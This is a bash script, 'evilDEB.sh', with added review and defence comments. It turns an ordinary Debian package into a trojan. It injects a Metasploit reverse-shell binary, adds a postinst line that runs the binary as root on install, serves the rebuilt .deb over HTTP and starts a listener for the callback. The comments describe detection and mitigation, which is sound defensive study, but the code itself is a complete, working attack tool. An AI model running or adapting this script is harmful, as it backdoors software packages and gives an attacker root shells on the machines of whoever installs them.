#!/bin/bash
# (C)opyright 2010 - g0tmi1k
# evilDEB.sh (v0.1 2010-07-30)
#
# Review annotation - what this listing does, read top to bottom:
#   1. unpacks a Debian package (a downloaded "xbomb" by default, or the file
#      given with -d) under /tmp/evilDEB,
#   2. writes a Metasploit-generated reverse-shell executable into the package
#      tree at tmp/g0tmi1k,
#   3. appends a line to (or creates) the postinst maintainer script so that
#      the executable is started when the package is installed,
#   4. rebuilds the package, serves the working directory over HTTP and starts
#      a Metasploit handler.
# Defensive reading: the rebuilt file is an ordinary-looking .deb whose only
# differences from the original are an extra file under /tmp and a changed
# postinst. Installing packages only through apt from signed repositories,
# or comparing a downloaded .deb's checksum with the repository's Packages
# index, rejects a repack like this one.

# Network interface (check with ifconfig) e.g. eth0
interface=eth0

# Settings *** Dont touch ***
# ourIP: the address after "inet addr:" in the ifconfig output for $interface.
export ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
# port: one random integer in 2000-65000, used as the callback port below.
export port=$(shuf -i 2000-65000 -n 1)
export version="0.1"

# Requires uid 0; otherwise prints an error to stderr and invokes cleanup.
if [ "$(id -u)" != "0" ]; then echo -e "\e[00;31m[-]\e[00m Not a superuser." 1>&2; cleanup; fi

trap 'cleanup' 2 # Interrupt - "Ctrl + C"

# cleanup: runs "killall python" in an xterm (this targets every process named
# python on the host, not only the web server started later), optionally
# removes the evilDEB/ directory, then exits 0.
# NOTE(review): "debug" is not assigned anywhere in this listing, so unless it
# is inherited from the environment the removal branch does not run and the
# working files stay on disk.
function cleanup() {
   echo
   echo -e "\e[01;32m[>]\e[00m Cleaning up..."
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall python"
   if [ "$debug" == "false" ]; then xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf evilDEB/"; fi
   echo -e "\e[01;36m[>]\e[00m Done! (= Have you... g0tmi1k?"
   exit 0
}

# help: prints the usage text and exits with status 1.
function help() {
   echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com Usage: bash evilDEB.sh -i [interface] -d [file] Common options: -i --- Network interface (check with ifconfig) e.g. eth0 -d --- DEB file to use "
   exit 1
}

echo -e "\e[01;36m[*]\e[00m g0tmilk's evilDEB v$version"

# Option parsing: -d sets debFile, -i sets interface, h/? show the usage text.
debFile=""
while getopts "d:i:m:dh?" OPTIONS; do
   case ${OPTIONS} in
      d ) export debFile=$OPTARG;;
      i ) export interface=$OPTARG;;
      ?|h ) help;;
      * ) echo "\e[00;31m[-]\e[00m Unknown option.";; # DEFAULT
   esac
done

echo -e "\e[01;32m[>]\e[00m Checking environment..."
# The -z test is true when pgrep prints nothing, i.e. when no python process
# was found; killall python is run in that case.
if [ -z "$(pgrep python)" ]; then
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall python"
fi
# Start from an empty, fixed working directory: /tmp/evilDEB.
if [ -e "/tmp/evilDEB" ]; then
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf /tmp/evilDEB/"
fi
mkdir -p /tmp/evilDEB/
cd /tmp/evilDEB/

# Choose the carrier package: with no -d argument, download xbomb without
# installing it (apt-get -d) and take the hard-coded file name from the apt
# cache; otherwise copy the supplied file into the working directory.
if [ "$debFile" == "" ]; then
   echo -e "\e[01;32m[>]\e[00m Downloading .DEB..."
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Downloading DEB..." -e "apt-get -d install xbomb"
   mv /var/cache/apt/archives/xbomb_2.1a-7_i386.deb ./
   debFile="xbomb_2.1a-7_i386.deb"
else
   cp $debFile ./
   ls
fi

echo -e "\e[01;32m[>]\e[00m Extracting .DEB..."
# Unpack the data files into extracted/ and the control archive into the
# current directory. Only "control" is copied into extracted/DEBIAN here
# (postinst is moved in further down); any other control members the original
# package had are not carried over into the rebuilt package.
# NOTE(defence): because of that, listing the control members of a suspect
# file (dpkg-deb -e) and diffing them against the distribution's copy of the
# same package version exposes the repack.
mkdir -p extracted/{DEBIAN,tmp}
dpkg -x $debFile extracted/
ar p $debFile control.tar.gz | tar zx
cp control extracted/DEBIAN/

echo -e "\e[01;32m[>]\e[00m Creating payload..."
# msfpayload writes an executable to extracted/tmp/g0tmi1k, configured with
# LHOST=$ourIP and LPORT=$port. Because it sits under tmp/ in the package
# tree, installation places it at /tmp/g0tmi1k.
# NOTE(defence): a package that ships a file under /tmp is anomalous; it shows
# up in "dpkg-deb -c <file>.deb" before anything is installed.
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating exploit" -e "/opt/metasploit3/bin/msfpayload linux/x86/shell_reverse_tcp LHOST=$ourIP LPORT=$port X > /tmp/evilDEB/extracted/tmp/g0tmi1k"

echo -e "\e[01;32m[>]\e[00m Injecting payload..."
# Append to an existing postinst, or create one with a /bin/sh shebang. The
# added line sets mode 2755 (setgid, rwxr-xr-x) on /tmp/g0tmi1k and starts it
# in the background under nohup with stdout/stderr sent to /dev/null.
# NOTE(defence): dpkg runs maintainer scripts as root, so this line executes
# with root privileges during install. Useful signals are a setgid executable
# in /tmp, a long-lived child of a postinst script, and an outbound connection
# from that child; mounting /tmp noexec stops the binary from being started.
if [ -e "postinst" ]; then
   echo -e "\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &" >> postinst
else
   echo -e "#! /bin/sh\n\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &" > postinst
fi
mv postinst extracted/DEBIAN/

echo -e "\e[01;32m[>]\e[00m Creating .DEB file..."
# Rebuild the tree into extracted.deb and rename it to evilDEB-<original
# file name> (the ##*/ expansion strips any directory part of $debFile).
chmod 755 extracted/DEBIAN/postinst
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating DEB..." -e "dpkg-deb --build /tmp/evilDEB/extracted"
mv extracted.deb evilDEB-${debFile##*/}

echo -e "\e[01;32m[>]\e[00m Running web server... (http://$ourIP:8000)"
#xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "/etc/init.d/apache2 start"
# Serve the current directory (/tmp/evilDEB) with Python's SimpleHTTPServer in
# the background. When debug is "false" the intermediate files are removed
# first; otherwise everything left in the directory is served as well.
if [ "$debug" == "false" ]; then
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf /tmp/evilDEB/extracted"
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -f /tmp/evilDEB/{changelog,control,postint}"
   xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "python -m SimpleHTTPServer"&
else
   python -m SimpleHTTPServer &
fi

echo -e "\e[01;32m[>]\e[00m Running metasploit..."
# Run the Metasploit multi/handler in the foreground with the same LHOST and
# LPORT; cleanup runs once msfcli returns.
/opt/metasploit3/bin/msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=$ourIP LPORT=$port E
cleanup